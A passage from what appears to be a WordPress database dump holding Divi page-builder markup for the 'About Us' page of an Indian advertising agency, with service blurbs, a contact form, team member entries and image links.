_builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\" alt=\"Creative graphic designing \" title_text=\"Creative graphic designing \"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field fullwidth_field=\"on\" _builder_version=\"4.5.2\" _module_preset=\"default\" field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" hover_enabled=\"0\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-07 19:24:16','2020-08-07 19:24:16','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/392-revision-v1/',0,'revision','',0),(551,1,'2020-08-07 19:24:30','2020-08-07 19:24:30','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"4.5.2\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/WhyWE.jpg\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\" alt=\"about WhatTheHell?\" title_text=\"whatthehell about us\" parallax=\"on\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Build Brand Equity</h2>\n<p>Our advertising and marketing startegies are aligned towards the core objectives of the business operation of sustainable sales leading to profit and building brand equity as long term asset creation for the businesses.</p>\n<p><span style=\"font-size: 16px;\">There is a need to understand the various phases of businesses &amp; invest in marketing (Sales or Brand Building) in the required proportion. As per the budget of the business we can align our marketing and advertising strategies into aggressive disruptive to guerilla or safe. As the successful advertising and marketing require patience and balancing various market forces to help your business thrust to an upward direction.</span></p>\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"56px||56px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"110px|0px|110px|0px\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\" hover_enabled=\"0\"]<p><span>With the advent to this digital era, <strong>Unique traffic to your website</strong>, is becoming the key battle point. Targeting the appropriate TG and reaching to them at the right place and the moment can help you earn them for lifetime.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||110px|\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"3.22\" custom_padding=\"110px||60px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>We do not fear trying new stuff and failure (we say learning). Meet the <span>team of professionals enjoying their work and adding value to your project.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\" hover_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Dhiraj Kumar\" position=\"Founder\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard.jpg\" linkedin_url=\"https://www.linkedin.com/in/dhirajwth\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" hover_enabled=\"0\" alt=\"dhiraj kumar founder \" title_text=\"dhiraj kumar whatthehell?\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Christina Foster\" position=\"Creative Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-06.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" hover_enabled=\"0\" locked=\"off\" alt=\"dhiraj kumar founder \" title_text=\"travel-portrait-06\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Jason Wardak\" position=\"Visual Media\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" 